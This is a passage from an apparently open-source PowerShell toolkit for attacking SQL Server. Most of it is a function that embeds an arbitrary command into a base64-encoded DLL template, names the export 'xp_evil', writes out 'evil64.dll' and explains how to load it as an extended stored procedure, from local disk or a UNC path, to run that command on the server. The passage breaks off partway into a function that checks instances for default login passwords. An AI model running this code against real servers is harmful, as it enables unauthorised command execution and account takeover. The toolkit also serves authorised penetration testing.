AAAAAAfCYCAAAAAACcJgIAAAAAALgmAgAAAAAA0iYCAAAAAABCJgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMYnAgAAAAAAricCAAAAAACSJwIAAAAAAHYnAgAAAAAAVCcCAAAAAADUJwIAAAAAADQnAgAAAAAAKCcCAAAAAAAWJwIAAAAAAAYnAgAAAAAA/CYCAAAAAADqJwIAAAAAAPQnAgAAAAAAACgCAAAAAAAcKAIAAAAAACwoAgAAAAAAPCgCAAAAAABCJwIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAF9fdGVsZW1ldHJ5X21haW5faW52b2tlX3RyaWdnZXIAKQBfX3RlbGVtZXRyeV9tYWluX3JldHVybl90cmlnZ2VyAAgAX19DX3NwZWNpZmljX2hhbmRsZXIAACUAX19zdGRfdHlwZV9pbmZvX2Rlc3Ryb3lfbGlzdAAALgBfX3ZjcnRfR2V0TW9kdWxlRmlsZU5hbWVXAC8AX192Y3J0X0dldE1vZHVsZUhhbmRsZVcAMQBfX3ZjcnRfTG9hZExpYnJhcnlFeFcAVkNSVU5USU1FMTQwRC5kbGwARQVzeXN0ZW0AAAQAX0NydERiZ1JlcG9ydAAFAF9DcnREYmdSZXBvcnRXAAB0AV9pbml0dGVybQB1AV9pbml0dGVybV9lAMECX3NlaF9maWx0ZXJfZGxsAHEBX2luaXRpYWxpemVfbmFycm93X2Vudmlyb25tZW50AAByAV9pbml0aWFsaXplX29uZXhpdF90YWJsZQAAtAJfcmVnaXN0ZXJfb25leGl0X2Z1bmN0aW9uAOUAX2V4ZWN1dGVfb25leGl0X3RhYmxlAMIAX2NydF9hdGV4aXQAwQBfY3J0X2F0X3F1aWNrX2V4aXQAAKQAX2NleGl0AABKBXRlcm1pbmF0ZQBoAF9fc3RkaW9fY29tbW9uX3ZzcHJpbnRmX3MAmwNfd21ha2VwYXRoX3MAALcDX3dzcGxpdHBhdGhfcwBjBXdjc2NweV9zAAB1Y3J0YmFzZWQuZGxsADAEUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAEAJHZXRDdXJyZW50UHJvY2Vzc0lkABQCR2V0Q3VycmVudFRocmVhZElkAADdAkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAFQDSW5pdGlhbGl6ZVNMaXN0SGVhZACuBFJ0bENhcHR1cmVDb250ZXh0ALUEUnRsTG9va3VwRnVuY3Rpb25FbnRyeQAAvARSdGxWaXJ0dWFsVW53aW5kAABqA0lzRGVidWdnZXJQcmVzZW50AJIFVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAABSBVNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgDFAkdldFN0YXJ0dXBJbmZvVwBwA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQAbQJHZXRNb2R1bGVIYW5kbGVXAABEBFJhaXNlRXhjZXB0aW9uAADUA011bHRpQnl0ZVRvV2lkZUNoYXIA3QVXaWRlQ2hhclRvTXVsdGlCeXRlAFYCR2V0TGFzdEVycm9yAAA4A0hlYXBBbGxvYwA8A0hlYXBGcmVlAACpAkdldFByb2Nlc3NIZWFwAACzBVZpcnR1YWxRdWVyeQAApAFGcmVlTGlicmFyeQCkAkdldFByb2NBZGRyZXNzAAAPAkdldEN1cnJlbnRQcm9jZXNzAHAFVGVybWluYXRlUHJvY2VzcwAAS0VSTkVMMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAABkAAAA2AAAASQAAAAAAAABMAAAANwAAAAsAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjEAGAAQAAAAAAAAAAAAAAbBIBgAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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BYqGCoCKkgqSipeK0A0AEADAAAAKigAAAAQAIADAAAAACgEKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + + # Convert it to a byte array + [Byte[]]$DllBytes = [Byte[]][Convert]::FromBase64String($DllBytes64) + + # This is the string in the DLL template that will need to be replaced + $BufferString = 'REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!REPLACEME!' + + # ----------------------------------------------- + # Setup command + # ----------------------------------------------- + + # Command to injectin into the DLL (if not defined by the user) + IF(-not($Command)) + { + $CommandString = 'echo This is a test. > c:\temp\test.txt && REM' + } + else + { + $CommandString = "$Command && REM" + } + + # Calculate the length of the BufferString + $BufferStringLen = $BufferString.Length + + # Calculate the length of the Command + $CommandStringLen = $CommandString.Length + + # Check if the command is to long to be accepted by cmd.exe used by the system call + if ($CommandStringLen -gt $BufferStringLen) + { + Write-Warning -Message ' Command is too long!' + Break + } + else + { + $BuffLenDiff = $BufferStringLen - $CommandStringLen + $NewBuffer = ' ' * $BuffLenDiff + $CommandString = "$CommandString && REM $NewBuffer" + } + + # Convert command string + $CommandStringBytes = ([system.Text.Encoding]::UTF8).GetBytes($CommandString) + + # Get string value of the DLL file + $S = [System.Text.Encoding]::ASCII.GetString($DllBytes) + + # Set the offset to 0 + $Index = 0 + + # Get the starting offset of the buffer string + $Index = $S.IndexOf($BufferString) + + if(($Index -eq 0) -and ($Index -ne -1)) + { + throw("Could not find string $BufferString !") + Break + } + else + { + Write-Verbose -Message " Found buffer offset for command: $Index" + } + + # Replace target bytes + for ($i = 0; $i -lt $CommandStringBytes.Length; $i++) + { + $DllBytes[$Index+$i] = $CommandStringBytes[$i] + } + + # ----------------------------------------------- + # Setup proc / dll function export name + # ----------------------------------------------- + $ProcNameBuffer = 'EVILEVILEVILEVILEVIL' + + # Set default dll name + IF(-not($ExportName)) + { + $ExportName = 'xp_evil' + } + + # Check function name length + $ProcNameBufferLen = $ProcNameBuffer.Length + $ExportNameLen = $ExportName.Length + If ($ProcNameBufferLen -lt $ExportNameLen) + { + Write-Warning -Message ' The function name is too long!' + Break + } + else + { + $ProcBuffLenDiff = $ProcNameBufferLen - $ExportNameLen + $ProcNewBuffer = '' * $ProcBuffLenDiff + #$ExportName = "$ExportName$ProcNewBuffer" # need to write nullbytes + } + + # Get function name string offset + $ProcIndex = 0 + + # Get string value of the DLL file + $S2 = [System.Text.Encoding]::ASCII.GetString($DllBytes) + + $ProcIndex = $S2.IndexOf($ProcNameBuffer) + + # Check for offset errors + if(($ProcIndex -eq 0) -and ($ProcIndex -ne -1)) + { + throw("Could not find string $ProcNameBuffer!") + Break + } + else + { + Write-Verbose -Message " Found buffer offset for function name: $ProcIndex" + } + + # Convert function name to bytes + $ExportNameBytes = ([system.Text.Encoding]::UTF8).GetBytes($ExportName) + + # Replace target bytes + for ($i = 0; $i -lt $ExportNameBytes.Length; $i++) + { + $DllBytes[$ProcIndex+$i] = $ExportNameBytes[$i] + } + + # Get offset for nulls + $NullOffset = $ProcIndex+$ExportNameLen + Write-Verbose -Message " Found buffer offset for buffer: $NullOffset" + $NullBytes = ([system.Text.Encoding]::UTF8).GetBytes($ProcNewBuffer) + + # Replace target bytes + for ($i = 0; $i -lt $ProcBuffLenDiff; $i++) + { + $DllBytes[$NullOffset+$i] = $NullBytes[$i] + } + + # ------------------------------------ + # Write DLL file to disk + # ------------------------------------ + + IF(-not($OutFile)) + { + $OutFile = '.\evil64.dll' + } + + Write-Verbose -Message "Creating DLL $OutFile" + Write-Verbose -Message " - Exported function name: $ExportName" + Write-Verbose -Message " - Exported function command: `"$Command`"" + Write-Verbose -Message " - Manual test: rundll32 $OutFile,$ExportName" + Set-Content -Value $DllBytes -Encoding Byte -Path $OutFile + Write-Verbose -Message ' - DLL written' + + Write-Verbose -Message ' ' + Write-Verbose -Message 'SQL Server Notes' + Write-Verbose -Message 'The exported function can be registered as a SQL Server extended stored procedure. Options below:' + Write-Verbose -Message " - Register xp via local disk: sp_addextendedproc `'$ExportName`', 'c:\temp\myxp.dll'" + Write-Verbose -Message " - Register xp via UNC path: sp_addextendedproc `'$ExportName`', `'\\servername\pathtofile\myxp.dll`'" + Write-Verbose -Message " - Unregister xp: sp_dropextendedproc `'$ExportName`'" +} + +# ---------------------------------- +# Get-SQLServerLoginDefaultPw +# ---------------------------------- +# Author: Scott Sutherland +# Reference: https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md +Function Get-SQLServerLoginDefaultPw +{ + <# + .SYNOPSIS + Based on the instance name, test if SQL Server is configured with default passwords. + .PARAMETER Instance + SQL Server instance to connection to. + .EXAMPLE + PS C:\> Get-SQLServerLoginDefaultPw -Instance SQLServer1\STANDARDDEV2014 + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLServerLoginDefaultPw -Verbose + VERBOSE: SQLServer1\SQLEXPRESS : Confirmed instance match. + VERBOSE: SQLServer1\SQLEXPRESS : No credential matches were found. + VERBOSE: SQLServer1\STANDARDDEV2014 : Confirmed instance match. + VERBOSE: SQLServer1\STANDARDDEV2014 : Confirmed default credentials - test/test + VERBOSE: SQLServer1 : No instance match found. + + Computer Instance Username Password IsSysadmin + -------- -------- -------- -------- -------- + SQLServer1 SQLServer1\STANDARDDEV2014 test test No + .EXAMPLE + PS C:\> Get-SQLInstanceLDomain | Get-SQLServerLoginDefaultPw -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblResults = New-Object -TypeName System.Data.DataTable + $TblResults.Columns.Add('Computer') | Out-Null + $TblResults.Columns.Add('Instance') | Out-Null + $TblResults.Columns.Add('Username') | Out-Null + 